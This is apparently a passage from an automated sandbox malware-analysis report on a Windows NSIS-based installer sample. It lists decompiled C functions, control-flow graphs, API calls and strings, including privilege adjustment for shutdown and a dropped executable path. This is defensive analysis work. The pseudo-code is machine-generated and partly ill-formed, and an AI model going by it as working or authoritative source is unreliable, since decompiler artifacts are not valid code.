                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                              • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                            • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                            • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                            • ExitProcess.KERNEL32(?), ref: 00403A59
                            • OleUninitialize.OLE32(?), ref: 00403A5E
                            • ExitProcess.KERNEL32 ref: 00403A78
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                            • ExitWindowsEx.USER32 ref: 00403AEB
                            • ExitProcess.KERNEL32 ref: 00403B0C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                            • API String ID: 2292928366-3502547859
                            • Opcode ID: fb71d40aeaad878488c5369afe35c68a3abfd82b90a6d5950651ba49b90856e7
                            • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                            • Opcode Fuzzy Hash: fb71d40aeaad878488c5369afe35c68a3abfd82b90a6d5950651ba49b90856e7
                            • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00403BEC Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215stringregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 141 403bec-403c04 call 40690a 144 403c06-403c11 GetUserDefaultUILanguage call 406484 141->144 145 403c18-403c4f call 40640b 141->145 149 403c16 144->149 150 403c51-403c62 call 40640b 145->150 151 403c67-403c6d lstrcatW 145->151 152 403c72-403c9b call 403ec2 call 405f14 149->152 150->151 151->152 158 403ca1-403ca6 152->158 159 403d2d-403d35 call 405f14 152->159 158->159 160 403cac-403cd4 call 40640b 158->160 165 403d43-403d68 LoadImageW 159->165 166 403d37-403d3e call 40657a 159->166 160->159 169 403cd6-403cda 160->169 167 403de9-403df1 call 40140b 165->167 168 403d6a-403d9a RegisterClassW 165->168 166->165 183 403df3-403df6 167->183 184 403dfb-403e06 call 403ec2 167->184 171 403da0-403de4 SystemParametersInfoW CreateWindowExW 168->171 172 403eb8 168->172 174 403cec-403cf8 lstrlenW 169->174 175 403cdc-403ce9 call 405e39 169->175 171->167 176 403eba-403ec1 172->176 177 403d20-403d28 call 405e0c call 40653d 174->177 178 403cfa-403d08 lstrcmpiW 174->178 175->174 177->159 178->177 182 403d0a-403d14 GetFileAttributesW 178->182 186 403d16-403d18 182->186 187 403d1a-403d1b call 405e58 182->187 183->176 193 403e0c-403e26 ShowWindow call 40689a 184->193 194 403e8f-403e97 call 405672 184->194 186->177 186->187 187->177 201 403e32-403e44 GetClassInfoW 193->201 202 403e28-403e2d call 40689a 193->202 199 403eb1-403eb3 call 40140b 194->199 200 403e99-403e9f 194->200 199->172 200->183 205 403ea5-403eac call 40140b 200->205 203 403e46-403e56 GetClassInfoW RegisterClassW 201->203 204 403e5c-403e8d DialogBoxParamW call 40140b call 403b3c 201->204 202->201 203->204 204->176 205->183
                            C-Code - Quality: 96%
                            			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E00406484(L"1033", _t73 & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, 0x440800) != 0) {
					L16:
					if(E00405F14(_t98, 0x440800) == 0) {
						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc;
								if( *0x433ecc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5);
							_t39 = E0040689A("RichEd20");
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0);
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(0x440800, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                            0x00403bf2
                            0x00403bfb
                            0x00403c02
                            0x00403c04
                            0x00403c18
                            0x00403c2a
                            0x00403c33
                            0x00403c3c
                            0x00403c43
                            0x00403c48
                            0x00403c4f
                            0x00403c62
                            0x00403c62
                            0x00403c6d
                            0x00403c06
                            0x00403c06
                            0x00403c11
                            0x00403c11
                            0x00403c72
                            0x00403c85
                            0x00403c8a
                            0x00403c9b
                            0x00403d2d
                            0x00403d35
                            0x00403d3e
                            0x00403d3e
                            0x00403d54
                            0x00403d5a
                            0x00403d68
                            0x00403de9
                            0x00403df1
                            0x00403dfb
                            0x00403e00
                            0x00403e06
                            0x00403e90
                            0x00403e95
                            0x00403e97
                            0x00403eb3
                            0x00000000
                            0x00403eb3
                            0x00403e99
                            0x00403e9f
                            0x00403ea7
                            0x00403ea7
                            0x00000000
                            0x00403e9f
                            0x00403e14
                            0x00403e1f
                            0x00403e24
                            0x00403e26
                            0x00403e2d
                            0x00403e2d
                            0x00403e38
                            0x00403e40
                            0x00403e42
                            0x00403e44
                            0x00403e4d
                            0x00403e50
                            0x00403e56
                            0x00403e56
                            0x00403e75
                            0x00403e86
                            0x00000000
                            0x00403e8b
                            0x00403df3
                            0x00403df5
                            0x00000000
                            0x00403d6a
                            0x00403d6a
                            0x00403d76
                            0x00403d80
                            0x00403d86
                            0x00403d8b
                            0x00403d9a
                            0x00403eb8
                            0x00403eb8
                            0x00000000
                            0x00403eb8
                            0x00403da9
                            0x00403de4
                            0x00000000
                            0x00403de4
                            0x00403ca1
                            0x00403ca1
                            0x00403ca4
                            0x00403ca6
                            0x00000000
                            0x00000000
                            0x00403cb4
                            0x00403cc6
                            0x00403ccb
                            0x00403cd4
                            0x00000000
                            0x00000000
                            0x00403cda
                            0x00403cdc
                            0x00403ce9
                            0x00403ce9
                            0x00403cf2
                            0x00403cf8
                            0x00403d20
                            0x00403d28
                            0x00000000
                            0x00403d0a
                            0x00403d0b
                            0x00403d14
                            0x00403d1a
                            0x00403d1b
                            0x00000000
                            0x00403d1b
                            0x00403d16
                            0x00403d18
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403d18
                            0x00403cf8

                            APIs
                              • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                              • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                            • GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C06
                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                            • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,?,?,?,C:\Users\user\AppData\Roaming\34432.exe,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76CDFAA0), ref: 00403CED
                            • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\34432.exe,?,?,?,C:\Users\user\AppData\Roaming\34432.exe,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,?,00000000,?), ref: 00403D0B
                            • LoadImageW.USER32 ref: 00403D54
                            • RegisterClassW.USER32 ref: 00403D91
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                            • CreateWindowExW.USER32 ref: 00403DDE
                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                            • GetClassInfoW.USER32 ref: 00403E40
                            • GetClassInfoW.USER32 ref: 00403E4D
                            • RegisterClassW.USER32 ref: 00403E56
                            • DialogBoxParamW.USER32 ref: 00403E75
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\34432.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                            • API String ID: 606308-2598761042
                            • Opcode ID: 5a24b6ccf2dff8f69514c8993659dfa0179b66eb04d645246d0b4e575a356aee
                            • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                            • Opcode Fuzzy Hash: 5a24b6ccf2dff8f69514c8993659dfa0179b66eb04d645246d0b4e575a356aee
                            • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040307D Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 214 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 217 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 214->217 218 4030cd-4030d2 214->218 226 4031f0-4031fe call 403019 217->226 227 40310b 217->227 219 4032ad-4032b1 218->219 233 403200-403203 226->233 234 403253-403258 226->234 229 403110-403127 227->229 231 403129 229->231 232 40312b-403134 call 4034cf 229->232 231->232 240 40325a-403262 call 403019 232->240 241 40313a-403141 232->241 236 403205-40321d call 4034e5 call 4034cf 233->236 237 403227-403251 GlobalAlloc call 4034e5 call 4032b4 233->237 234->219 236->234 260 40321f-403225 236->260 237->234 265 403264-403275 237->265 240->234 245 403143-403157 call 405fe8 241->245 246 4031bd-4031c1 241->246 251 4031cb-4031d1 245->251 263 403159-403160 245->263 250 4031c3-4031ca call 403019 246->250 246->251 250->251 256 4031e0-4031e8 251->256 257 4031d3-4031dd call 4069f7 251->257 256->229 264 4031ee 256->264 257->256 260->234 260->237 263->251 269 403162-403169 263->269 264->226 266 403277 265->266 267 40327d-403282 265->267 266->267 270 403283-403289 267->270 269->251 271 40316b-403172 269->271 270->270 272 40328b-4032a6 SetFilePointer call 405fe8 270->272 271->251 273 403174-40317b 271->273 277 4032ab 272->277 273->251 274 40317d-40319d 273->274 274->234 276 4031a3-4031a7 274->276 278 4031a9-4031ad 276->278 279 4031af-4031b7 276->279 277->219 278->264 278->279 279->251 280 4031b9-4031bb 279->280 280->251
                            C-Code - Quality: 80%
                            			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x434f0c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x443800, 0x400);
				_t89 = E0040602D(0x443800, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x441800, 0x443800);
				E0040653D(0x444000, E00405E58(0x441800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x434f14 - _t82;
					if( *0x434f14 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
								__eflags =  *0x434f1c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					_t65 = E004034CF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034CF(0x416a18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434f14;
						if( *0x434f14 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41ea18; // 0x47ed1b
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434f14 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42aa24; // 0x47ed1f
						if(__eflags < 0) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}






























                            0x00403085
                            0x00403088
                            0x0040308b
                            0x004030a5
                            0x004030aa
                            0x004030bd
                            0x004030c2
                            0x004030c5
                            0x004030cb
                            0x00000000
                            0x004030cd
                            0x004030de
                            0x004030ef
                            0x004030f6
                            0x004030fc
                            0x004030fe
                            0x00403103
                            0x00403105
                            0x004031f0
                            0x004031f2
                            0x004031f7
                            0x004031fe
                            0x00000000
                            0x00000000
                            0x00403200
                            0x00403203
                            0x00403227
                            0x00403227
                            0x0040322c
                            0x00403232
                            0x0040323d
                            0x00403242
                            0x00403242
                            0x00403245
                            0x00403246
                            0x00403247
                            0x00403249
                            0x0040324e
                            0x00403251
                            0x00403264
                            0x00403268
                            0x00403270
                            0x00403275
                            0x00403277
                            0x00403277
                            0x00403277
                            0x0040327f
                            0x0040327f
                            0x00403282
                            0x00403283
                            0x00403283
                            0x00403286
                            0x00403288
                            0x00403288
                            0x00403288
                            0x00403292
                            0x00403298
                            0x004032a6
                            0x004032ab
                            0x00000000
                            0x004032ab
                            0x00000000
                            0x00403251
                            0x0040320b
                            0x00403216
                            0x0040321b
                            0x0040321d
                            0x00000000
                            0x00000000
                            0x00403222
                            0x00403225
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040310b
                            0x00403110
                            0x00403115
                            0x00403119
                            0x00403120
                            0x00403125
                            0x00403127
                            0x00403129
                            0x00403129
                            0x0040312d
                            0x00403132
                            0x00403134
                            0x0040325c
                            0x00403253
                            0x00000000
                            0x00403253
                            0x0040313a
                            0x00403141
                            0x004031bd
                            0x004031c1
                            0x004031c5
                            0x004031ca
                            0x00000000
                            0x004031c1
                            0x0040314a
                            0x0040314f
                            0x00403152
                            0x00403157
                            0x00000000
                            0x00000000
                            0x00403159
                            0x00403160
                            0x00000000
                            0x00000000
                            0x00403162
                            0x00403169
                            0x00000000
                            0x00000000
                            0x0040316b
                            0x00403172
                            0x00000000
                            0x00000000
                            0x00403174
                            0x0040317b
                            0x00000000
                            0x00000000
                            0x0040317d
                            0x00403183
                            0x0040318c
                            0x00403192
                            0x00403195
                            0x00403197
                            0x0040319d
                            0x00000000
                            0x00000000
                            0x004031a3
                            0x004031a7
                            0x004031af
                            0x004031af
                            0x004031b2
                            0x004031b5
                            0x004031b7
                            0x004031b9
                            0x004031b9
                            0x00000000
                            0x004031b7
                            0x004031a9
                            0x004031ad
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004031cb
                            0x004031cb
                            0x004031d1
                            0x004031dd
                            0x004031dd
                            0x004031e0
                            0x004031e6
                            0x004031e6
                            0x004031e6
                            0x004031ee
                            0x004031ee
                            0x00000000
                            0x004031ee

                            APIs
                            • GetTickCount.KERNEL32 ref: 0040308E
                            • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                            • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                            • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                            Strings
                            • Null, xrefs: 00403174
                            • Inst, xrefs: 00403162
                            • }8@, xrefs: 00403227, 00403242
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
                            • Error launching installer, xrefs: 004030CD
                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                            • soft, xrefs: 0040316B
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                            • API String ID: 2803837635-3397361934
                            • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                            • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                            • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                            • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040657A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 281 40657a-406585 282 406587-406596 281->282 283 406598-4065ae 281->283 282->283 284 4065b0-4065bd 283->284 285 4065c6-4065cf 283->285 284->285 286 4065bf-4065c2 284->286 287 4065d5 285->287 288 4067aa-4067b5 285->288 286->285 289 4065da-4065e7 287->289 290 4067c0-4067c1 288->290 291 4067b7-4067bb call 40653d 288->291 289->288 292 4065ed-4065f6 289->292 291->290 294 406788 292->294 295 4065fc-406639 292->295 298 406796-406799 294->298 299 40678a-406794 294->299 296 40672c-406731 295->296 297 40663f-406646 295->297 303 406733-406739 296->303 304 406764-406769 296->304 300 406648-40664a 297->300 301 40664b-40664d 297->301 302 40679b-4067a4 298->302 299->302 300->301 305 40668a-40668d 301->305 306 40664f-406676 call 40640b 301->306 302->288 309 4065d7 302->309 310 406749-406755 call 40653d 303->310 311 40673b-406747 call 406484 303->311 307 406778-406786 lstrlenW 304->307 308 40676b-406773 call 40657a 304->308 315 40669d-4066a0 305->315 316 40668f-40669b GetSystemDirectoryW 305->316 326 406713-406717 306->326 327 40667c-406685 call 40657a 306->327 307->302 308->307 309->289 319 40675a-406760 310->319 311->319 322 4066a2-4066b0 GetWindowsDirectoryW 315->322 323 406709-40670b 315->323 321 40670d-406711 316->321 319->307 324 406762 319->324 321->326 328 406724-40672a call 4067c4 321->328 322->323 323->321 325 4066b2-4066ba 323->325 324->328 332 4066d1-4066e7 SHGetSpecialFolderLocation 325->332 333 4066bc-4066c5 325->333 326->328 329 406719-40671f lstrcatW 326->329 327->321 328->307 329->328 334 406705 332->334 335 4066e9-406703 SHGetPathFromIDListW CoTaskMemFree 332->335 338 4066cd-4066cf 333->338 334->323 335->321 335->334 338->321 338->332
                            C-Code - Quality: 72%
